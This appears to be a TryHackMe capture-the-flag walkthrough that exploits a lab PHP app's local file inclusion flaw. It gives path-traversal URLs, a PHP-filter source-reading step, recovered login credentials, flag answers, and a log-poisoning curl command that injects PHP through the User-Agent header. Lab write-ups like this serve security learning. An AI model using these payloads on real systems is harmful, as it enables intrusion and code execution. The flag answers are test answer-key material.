- Deploy the attached VM and look around. What is the entry point for our web application?
ANS: err
EXPLANATION:
- Open this link which provided by TryHackMe (https://10-10-140-155.p.thmlabs.com/logs.php) and go to home page and you will notice the URL section index.php?err=error.txt
2. Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
ANS: THM{d29e08941cf7fe41df55f1a7da6c4c06}
EXPLANATION:
Step 1: Once in home , https://10-10-140-155.p.thmlabs.com/index.php?err=error.txt .Replace the error.txt with ../../../../../../../../../etc/flag
eg:
https://10-10-140-155.p.thmlabs.com/index.php?err=../../../../../../../../../etc/flag
3. Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?
ANS: THM{791d43d46018a0d89361dbf60d5d9eb8}
EXPLANATION:
Step 1: We can`t access the index.php directly as we did in Question 2. We need to use php filter and encode it in base64 to get the content of index.php.
add this command after the in err=
eg:
Step 2: Copy the base64 string and paste in the input box of base64decode (https://www.base64decode.org/) , decode it and you will get the flag.
4. McSkidy forgot his login credential. Can you help him to login in order to recover one of the server’s passwords?
Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?
ANS: McSkidy:A0C315Aw3s0m
EXPLANATION:
Step 1: In Question 3 after we decode we found that that is a directory/file called: ./includes/creds.php .So, same steps as we did in Question 3 instead of index.php, replace it with ./includes/creds.php
eg:
Step 2: Copy the base64 string and paste in the input box of base64decode (https://www.base64decode.org/) , decode it and you will get the credentials of McSkidy.
5. Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server?
ANS: THM{552f313b52e3c3dbf5257d8c6db7f6f1}
EXPLANATION:
Step 1: Once we know McSkidy`s Login Credentials. Login and Go to Password Recovery and you will find the flag.
6. The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
ANS: lfi-aoc-awesome-59aedca683fff9261263bb084880c965
EXPLANATION:
Step 1: Make sure the website is login, Go to Log Access
Step 2: Open Terminal(Your Machine) , run this command
curl -A “<?php phpinfo();?>” http://10-10-149-25.p.thmlabs.com/login.php
Then Refresh the website.
Step 3: Logout out from the website and go to Home Dashboard
Replace the error.txt in URL with ./includes/logs/app_access.log
We will get the PHP Info of the site, the System is the hostname.
*****************THANK YOU****KEEP LEARNING ******************
HOPE YOU GUYS, THIS WALKTHROUGH MIGHT HELP YOU,IF SO LIKE THE PAGE WILL BE MUCH APPRECIATED AND FOLLOW MY PROFILE FOR MORE WRITE-UPS
*******PEACE*****
